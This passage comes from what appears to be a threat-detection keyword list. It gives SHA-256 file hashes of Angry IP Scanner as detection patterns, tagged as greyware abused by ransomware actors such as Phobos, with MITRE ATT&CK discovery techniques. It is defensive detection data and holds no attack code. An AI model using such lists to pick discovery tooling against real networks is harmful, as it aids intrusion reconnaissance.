"*71c807766303d5e102509a7209831660c1c947db0da3d3c1e3f9be5be5d5ceb3*",".{0,1000}71c807766303d5e102509a7209831660c1c947db0da3d3c1e3f9be5be5d5ceb3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*72cfa26b9ac9f6c0e9af071df88f52d526b6b1301ab1c3e7055416e059ba7926*",".{0,1000}72cfa26b9ac9f6c0e9af071df88f52d526b6b1301ab1c3e7055416e059ba7926.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*73857ff880d961978dc2b9d183462db429be5397341f2d2e8885c8807c0919e3*",".{0,1000}73857ff880d961978dc2b9d183462db429be5397341f2d2e8885c8807c0919e3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*73eb5215f2d0d3a768bceff7c385d7cc3cf2cd2d0f7e8b19ceedb9a5c8b35a05*",".{0,1000}73eb5215f2d0d3a768bceff7c385d7cc3cf2cd2d0f7e8b19ceedb9a5c8b35a05.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*74173938c4040e181f011e7e2f6cdb171244c84f96517d0392a7759bf7d72f12*",".{0,1000}74173938c4040e181f011e7e2f6cdb171244c84f96517d0392a7759bf7d72f12.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*74b61c34014cb422b0eee3c53b32cde42a911c53bdfe80e074546fb26376628b*",".{0,1000}74b61c34014cb422b0eee3c53b32cde42a911c53bdfe80e074546fb26376628b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*74fbccc09445b0aba5eeccf05da49fbfca37508e6ff7e271dff3f5e6d78341a6*",".{0,1000}74fbccc09445b0aba5eeccf05da49fbfca37508e6ff7e271dff3f5e6d78341a6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*75cb7ebd2e1f98eb7e97929ed659acbbd93b230bae532421a9b5f17ad13cdf86*",".{0,1000}75cb7ebd2e1f98eb7e97929ed659acbbd93b230bae532421a9b5f17ad13cdf86.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*762089017bf87803b74509640cd7affd14e56e96747cbccfa324c4f766379470*",".{0,1000}762089017bf87803b74509640cd7affd14e56e96747cbccfa324c4f766379470.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*769239f45299ec58cc7328bb467a8bd72ba5e3f37b73ebbaae6915c3460668c4*",".{0,1000}769239f45299ec58cc7328bb467a8bd72ba5e3f37b73ebbaae6915c3460668c4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*76ccaaf7c67797cd5a61ce1855f5d8119c00970383b5a0e138b919434c63a0ce*",".{0,1000}76ccaaf7c67797cd5a61ce1855f5d8119c00970383b5a0e138b919434c63a0ce.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7737f7230b1f09b12b877710b8add003b01c59d51ac734bedeb283ef686010e9*",".{0,1000}7737f7230b1f09b12b877710b8add003b01c59d51ac734bedeb283ef686010e9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*784e6ae14f95b6980d03543b36191595f5f4087f00bb7dd75086ac86c8148923*",".{0,1000}784e6ae14f95b6980d03543b36191595f5f4087f00bb7dd75086ac86c8148923.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*786b267fff4f1a5d826418d127432d495d21e25eb3261c0e6c9f2db18abc5962*",".{0,1000}786b267fff4f1a5d826418d127432d495d21e25eb3261c0e6c9f2db18abc5962.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*78ddbc63bc64a5f1dd67be4a5ef8ee94ec59c9492fabe3a2b96eb115f755be90*",".{0,1000}78ddbc63bc64a5f1dd67be4a5ef8ee94ec59c9492fabe3a2b96eb115f755be90.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7903eb393533b1ce51e527cae1ba3c4da6752f87d2717c3984b39228ce65a028*",".{0,1000}7903eb393533b1ce51e527cae1ba3c4da6752f87d2717c3984b39228ce65a028.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7a3c9d753d8905987a2cccdca22a3dc2e1002ea396574c44cd38688bd184c9e8*",".{0,1000}7a3c9d753d8905987a2cccdca22a3dc2e1002ea396574c44cd38688bd184c9e8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7ba37f26aaa4de6fa3f0b1d77eb2d6b0f14f7df9acc8bb7ff8837cddb8941fa7*",".{0,1000}7ba37f26aaa4de6fa3f0b1d77eb2d6b0f14f7df9acc8bb7ff8837cddb8941fa7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7c826148232f2a27362b5da0e089ce532476f5dbf66d57a95bc1af88aaf890ad*",".{0,1000}7c826148232f2a27362b5da0e089ce532476f5dbf66d57a95bc1af88aaf890ad.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7ca86e21a7433649ab9a2adc49dcdd8a6a415969c16a4158bf32cb06dfa1f8a5*",".{0,1000}7ca86e21a7433649ab9a2adc49dcdd8a6a415969c16a4158bf32cb06dfa1f8a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7e3a5a3901bc2af3a00c4c3e2296f0064778b5be47ae0d0b2eee7afb72d8b3d8*",".{0,1000}7e3a5a3901bc2af3a00c4c3e2296f0064778b5be47ae0d0b2eee7afb72d8b3d8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7e3dbba1c95060ddc7fe1bf52e869246a6923e9695aa8d724feb8c5c1a5f8e37*",".{0,1000}7e3dbba1c95060ddc7fe1bf52e869246a6923e9695aa8d724feb8c5c1a5f8e37.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7e7f92d6ff919fe8cbe63f2daa348d122339d1a0aac0883afcf799facd214810*",".{0,1000}7e7f92d6ff919fe8cbe63f2daa348d122339d1a0aac0883afcf799facd214810.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7eb68ed7e2a9ca4802a0988d2d41cf8b859c00b8add791c52a304f434120c5b1*",".{0,1000}7eb68ed7e2a9ca4802a0988d2d41cf8b859c00b8add791c52a304f434120c5b1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*7fb420b5290c157897884e59a8a08988d5884f3fb586b557df48fe061b614b59*",".{0,1000}7fb420b5290c157897884e59a8a08988d5884f3fb586b557df48fe061b614b59.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8007c76597a892e234a78716e7fd500ca28d278ade6e5d4de965b35c6fefc7fd*",".{0,1000}8007c76597a892e234a78716e7fd500ca28d278ade6e5d4de965b35c6fefc7fd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8023ad4a809f53faf76bc6c9b200e50b8145c561b076f6817ce22ab8b16ac25e*",".{0,1000}8023ad4a809f53faf76bc6c9b200e50b8145c561b076f6817ce22ab8b16ac25e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*806238839177ab580463a61cc47e98ed9827f1bff3f9c501df53b51fecc84c16*",".{0,1000}806238839177ab580463a61cc47e98ed9827f1bff3f9c501df53b51fecc84c16.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*807d6097fa6f16777eb54bc3be9639757e3dba0ca57c2a9d6b6b699289163df3*",".{0,1000}807d6097fa6f16777eb54bc3be9639757e3dba0ca57c2a9d6b6b699289163df3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*81e30731b5eb8a1e704c146062efd856cbfd37ceba4874d5907f84ac7deb59c9*",".{0,1000}81e30731b5eb8a1e704c146062efd856cbfd37ceba4874d5907f84ac7deb59c9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*81f47f6cd4d534902c6d146c6cf8bcb7e50d2b7b04d7402268e952278293347a*",".{0,1000}81f47f6cd4d534902c6d146c6cf8bcb7e50d2b7b04d7402268e952278293347a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*83d5b44bdd3d37cf3bc76b3e9e433c947c7917fa6fe8522d2e4421fecdfaf987*",".{0,1000}83d5b44bdd3d37cf3bc76b3e9e433c947c7917fa6fe8522d2e4421fecdfaf987.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*83e5e64474d446fb7f612d21968e4826a23f008e00110b199b35896eeb9436b4*",".{0,1000}83e5e64474d446fb7f612d21968e4826a23f008e00110b199b35896eeb9436b4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*83eeacb73e1ba4d3eb4d91887fa338e27c3ec91e283d6cdf2522322449b5e8ab*",".{0,1000}83eeacb73e1ba4d3eb4d91887fa338e27c3ec91e283d6cdf2522322449b5e8ab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*845b979d93d58f985c1b6e1153fcfc12732c4d28a02cbae528cf106e55cfb93a*",".{0,1000}845b979d93d58f985c1b6e1153fcfc12732c4d28a02cbae528cf106e55cfb93a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*87d71be6639e0c89794aec6646ca5894c4be239c61462b4a8e78548898c553e6*",".{0,1000}87d71be6639e0c89794aec6646ca5894c4be239c61462b4a8e78548898c553e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*88d829d4560be8d3c7323523d84320910daec9354336166d0ebba78f24032819*",".{0,1000}88d829d4560be8d3c7323523d84320910daec9354336166d0ebba78f24032819.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*88e1851d5b2c7725bb5e2cd08a45077496d207d8e04b56b35b982d6e32846f20*",".{0,1000}88e1851d5b2c7725bb5e2cd08a45077496d207d8e04b56b35b982d6e32846f20.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0*",".{0,1000}892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*89928c5882095cfc598c9479d2f5e7d9a41c3581fc0fd447237d79a310c305cc*",".{0,1000}89928c5882095cfc598c9479d2f5e7d9a41c3581fc0fd447237d79a310c305cc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*89b153d078008da7bf1d05f4f2f6a655f2757472a9275e2895b311d44dfcccbe*",".{0,1000}89b153d078008da7bf1d05f4f2f6a655f2757472a9275e2895b311d44dfcccbe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8b8c267ddc5eadfb6f8de8bf34fdcba33016bfad0111a38e804f328d4c8c07ba*",".{0,1000}8b8c267ddc5eadfb6f8de8bf34fdcba33016bfad0111a38e804f328d4c8c07ba.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8c4f57209e64bf6c59a9199663c8a386fc03f893d7f05539fb0f9b4a73420918*",".{0,1000}8c4f57209e64bf6c59a9199663c8a386fc03f893d7f05539fb0f9b4a73420918.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8d0b5ca232aa2109cf7fbc5a1c046d1836d4554e8a572eb41f8967f15ca7aa91*",".{0,1000}8d0b5ca232aa2109cf7fbc5a1c046d1836d4554e8a572eb41f8967f15ca7aa91.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8f0b8c0bc95134a4de6b0e1843e4f06f895a86778eaf0ec4de037827e14a75ff*",".{0,1000}8f0b8c0bc95134a4de6b0e1843e4f06f895a86778eaf0ec4de037827e14a75ff.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8f72c5927a494dd87792908f62fbe8860e2f0c10c1ff1f622c5a484fcd78ad2e*",".{0,1000}8f72c5927a494dd87792908f62fbe8860e2f0c10c1ff1f622c5a484fcd78ad2e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*8faa1748975d3557974c240d1f30bfc6f100a4ec3a9c2f405c0814dfd45fe384*",".{0,1000}8faa1748975d3557974c240d1f30bfc6f100a4ec3a9c2f405c0814dfd45fe384.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*905332f37ef23c8e8313a76e89ef3388329427c9136de626ae4f7cc5876c584e*",".{0,1000}905332f37ef23c8e8313a76e89ef3388329427c9136de626ae4f7cc5876c584e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*92c11dc911a2dd27aab2a607f55135cfe30da9fe68d3604b2efd798faf640a76*",".{0,1000}92c11dc911a2dd27aab2a607f55135cfe30da9fe68d3604b2efd798faf640a76.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*932c73eab9396ea8804470d3877d844f29c2e45ea3826792e3fd40e2c455b34c*",".{0,1000}932c73eab9396ea8804470d3877d844f29c2e45ea3826792e3fd40e2c455b34c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*935c0c6c3eee84d0550edaf387712dd24924d94ae327244ae36611c4ebbeda49*",".{0,1000}935c0c6c3eee84d0550edaf387712dd24924d94ae327244ae36611c4ebbeda49.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*94e9de0688840caca05e9d77b64b3c1e5ff94d9c45cb5715395d419ae09c7559*",".{0,1000}94e9de0688840caca05e9d77b64b3c1e5ff94d9c45cb5715395d419ae09c7559.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*95124c125ab9185d2895ee5462d67235f7391e79288ddef6f3ffb3c918da6fcb*",".{0,1000}95124c125ab9185d2895ee5462d67235f7391e79288ddef6f3ffb3c918da6fcb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9590b53e0fb6f32911ba12dd08129a125fda9f2be61225233d851570655cd962*",".{0,1000}9590b53e0fb6f32911ba12dd08129a125fda9f2be61225233d851570655cd962.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*95eadd9a35d11abd017c6355f1b1cfbe7b566cee62bead208c64931c25f610e6*",".{0,1000}95eadd9a35d11abd017c6355f1b1cfbe7b566cee62bead208c64931c25f610e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*969f92d8c70737c5c3e3bff8379c3d432188ebacd379428b8a49def2ca8fd582*",".{0,1000}969f92d8c70737c5c3e3bff8379c3d432188ebacd379428b8a49def2ca8fd582.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*974aa1a4d6ec99c9db926c0d46c76e7158c5d554a1b5a46cc36620244a27f39e*",".{0,1000}974aa1a4d6ec99c9db926c0d46c76e7158c5d554a1b5a46cc36620244a27f39e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
